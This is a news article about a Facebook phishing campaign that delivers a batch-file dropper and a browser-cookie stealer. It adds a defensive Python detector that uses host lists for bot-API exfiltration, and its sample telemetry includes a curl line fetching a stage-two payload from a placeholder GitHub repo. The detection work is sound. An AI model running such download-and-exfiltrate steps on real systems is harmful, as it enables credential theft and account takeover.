One of the best and worst things about social media platforms like Facebook is that anyone can send you a message. While most of the time these unsolicited messages will come from old classmates and friends, they can also be sent by hackers.
As reported by BleepingComputer, hackers are using a massive network of fake and hacked Facebook accounts to send out phishing messages with the end goal of tricking people into installing password-stealing malware.
While this new campaign discovered by Guardio Labs is specifically targeting Facebook Business accounts, it still highlights the risk of opening and responding to unsolicited messages on Facebook and other social media platforms.
Using Facebook for phishing
Just like other phishing campaigns we've observed in the past, this one uses fake copyright violation notices to get the attention of business owners. Questions about particular products a business sells are a second lure used in the same campaign.
Following their initial messages, the hackers send a RAR or ZIP archive containing a batch file, in the hope that unsuspecting users will extract and launch it. If they do, the batch file fetches a malware dropper from GitHub and infects the system with password-stealing malware.
Alongside the payload, the batch file downloads a standalone Python environment that runs the malware, and the malware is set to execute each time the system starts up so that it keeps its foothold on the infected computer. As Guardio Labs points out in a blog post detailing its findings, the payload is wrapped in five layers of obfuscation, which makes it difficult for antivirus software to detect.
Once it is running, the malware collects all of the cookies and saved login data in the victim's browser, packs them into a ZIP file and sends that file back to the hackers through the Telegram or Discord bot API. It then goes a step further and deletes the cookies from the victim's browser, which logs the victim out of their accounts. That gives the hackers a window in which to change the passwords on those accounts and take them over before the victim notices anything is wrong.
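The chain described above (a batch file launched from an extracted archive, a download from GitHub, a Python runtime dropped into a user directory, and a non-browser process talking to the Telegram or Discord bot API) is the kind of thing endpoint telemetry can flag. The following is an added example, not code from Guardio Labs or BleepingComputer: a small heuristic detector run over constructed, Sysmon-style process-creation and network-connection events. Every path, PID, hostname and command line in the sample data is made up, and the rule names and thresholds are the author's assumptions.

```python
"""Heuristic detector for the batch-file -> GitHub dropper -> bundled Python ->
bot-API exfiltration chain. Added example; all sample events are constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Directories an ordinary user can write to, where an extracted archive or a
# dropped runtime would land. Assumption: default Windows profile layout.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(Downloads|Desktop|AppData\\Local\\Temp)\\", re.I)
BATCH_FILE = re.compile(r"\.(bat|cmd)\b", re.I)
# Code-hosting domains used to stage the dropper (per the article above).
STAGING_HOSTS = ("github.com", "raw.githubusercontent.com")
# Bot/webhook API hosts the stolen data is sent to (per the article above).
EXFIL_HOSTS = ("api.telegram.org", "discord.com", "discordapp.com")
# Processes for which traffic to EXFIL_HOSTS is expected.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "discord.exe", "telegram.exe"}


@dataclass
class Finding:
    root_pid: int                                   # the cmd.exe that ran the batch file
    rules: set[str] = field(default_factory=set)    # which heuristics fired in its subtree
    pids: set[int] = field(default_factory=set)     # processes involved


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def host_matches(host: str, patterns: tuple[str, ...]) -> bool:
    host = host.lower()
    return any(host == p or host.endswith("." + p) for p in patterns)


def analyze(events: list[dict]) -> list[Finding]:
    """Attribute each suspicious event to the nearest ancestor cmd.exe that
    launched a batch file from a user-writable directory (or to itself if
    there is none), and record every rule that fires in that subtree."""
    parent, image, batch_roots = {}, {}, set()
    for ev in events:
        if ev["type"] == "process":
            parent[ev["pid"]] = ev["ppid"]
            image[ev["pid"]] = ev["image"]
            if (basename(ev["image"]) == "cmd.exe" and BATCH_FILE.search(ev["cmd"])
                    and USER_WRITABLE.search(ev["cmd"])):
                batch_roots.add(ev["pid"])

    def root_of(pid: int) -> int:
        cur, seen = pid, set()
        while cur in parent and cur not in seen:
            if cur in batch_roots:
                return cur
            seen.add(cur)
            cur = parent[cur]
        return pid

    findings: dict[int, Finding] = {}

    def tag(pid: int, rule: str) -> None:
        root = root_of(pid)
        f = findings.setdefault(root, Finding(root_pid=root))
        f.rules.add(rule)
        f.pids.add(pid)

    for ev in events:
        pid = ev["pid"]
        if ev["type"] == "process":
            if pid in batch_roots:
                tag(pid, "batch_from_user_dir")
            if any(h in ev["cmd"].lower() for h in STAGING_HOSTS):
                tag(pid, "fetch_from_code_host")
            name = basename(ev["image"])
            if name.startswith("python") and name.endswith(".exe") and USER_WRITABLE.search(ev["image"]):
                tag(pid, "python_runtime_in_user_dir")
        elif ev["type"] == "network":
            if host_matches(ev["dest"], STAGING_HOSTS):
                tag(pid, "fetch_from_code_host")
            if host_matches(ev["dest"], EXFIL_HOSTS) and basename(image.get(pid, "")) not in BROWSERS:
                tag(pid, "bot_api_from_non_browser")
    return sorted(findings.values(), key=lambda f: f.root_pid)


def alerts(events: list[dict], min_rules: int = 2) -> list[Finding]:
    """Only report a process tree when at least min_rules heuristics agree."""
    return [f for f in analyze(events) if len(f.rules) >= min_rules]


# Constructed telemetry: two benign processes, then one infection chain.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "cmd": "chrome.exe"},
    {"type": "network", "pid": 100, "dest": "discord.com"},
    {"type": "process", "pid": 110, "ppid": 1, "image": r"C:\Program Files\Python311\python.exe", "cmd": "python.exe -m pip install requests"},
    {"type": "network", "pid": 110, "dest": "pypi.org"},
    {"type": "process", "pid": 200, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c "C:\Users\alice\Downloads\notice\Copyright_Violation.bat"'},
    {"type": "process", "pid": 201, "ppid": 200, "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl -L https://raw.githubusercontent.com/example/repo/main/stage2.zip -o %TEMP%\stage2.zip"},
    {"type": "network", "pid": 201, "dest": "raw.githubusercontent.com"},
    {"type": "process", "pid": 202, "ppid": 200, "image": r"C:\Users\alice\AppData\Local\Temp\py\python.exe",
     "cmd": r"python.exe C:\Users\alice\AppData\Local\Temp\py\run.py"},
    {"type": "network", "pid": 202, "dest": "api.telegram.org"},
]

if __name__ == "__main__":
    for f in alerts(SAMPLE_EVENTS):
        print(f"root pid {f.root_pid}: {sorted(f.rules)} across pids {sorted(f.pids)}")
```

Each rule on its own would be noisy (developers run Python from Temp, and plenty of legitimate scripts pull from GitHub), which is why the alert requires two or more rules to fire within the same process tree; in the sample, the browser's Discord traffic and the properly installed Python interpreter produce no finding at all, while the batch-file subtree trips all four.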
According to Guardio Labs’ researchers, around 100,000 phishing messages are sent out each week targeting Facebook users in North America, Europe, Australia, Japan and Southeast Asia. To make matters worse, 7% of all Facebook Business accounts have been targeted, though just 0.4% have downloaded the malicious file used to infect their systems with malware.
How to stay safe from phishing campaigns spreading malware
Just like when checking your inbox, you need to be extremely careful when dealing with messages on Facebook and other social media sites from unknown senders.
To determine if a message is genuine or not you should look out for red flags like misspelt words and poor grammar along with a sense of urgency. The last one is the most important as hackers often try to use your emotions against you in order to trick you into clicking on their messages or downloading the attachments they’ve sent you.
In the campaign described above, the hackers used fake copyright violation notices to create that sense of urgency. A Facebook Business user worried about a copyright lawsuit might download and open the attached batch file without thinking, and a batch file is a script that runs commands on your computer, not a document; no genuine notice arrives in that form. Even if you're not a business owner, you shouldn't open attachments, or even images, sent to you on social media by someone you don't know.
Malware can often evade antivirus software, so you may also want to invest in one of the best identity theft protection services, which can help you recover from financial losses suffered as a result of fraud or online scams. If you have already run a file like this, treat every password saved in that browser as compromised: change those passwords from a different, clean device, and sign out of all other sessions where the service allows it.
With three billion users worldwide as of August of this year according to Statista, Facebook remains one of the most popular social media platforms. Unfortunately, its massive user base means it will continue to be a hunting ground for hackers. It's up to you to read your messages carefully and avoid opening or responding to any that look like a lure.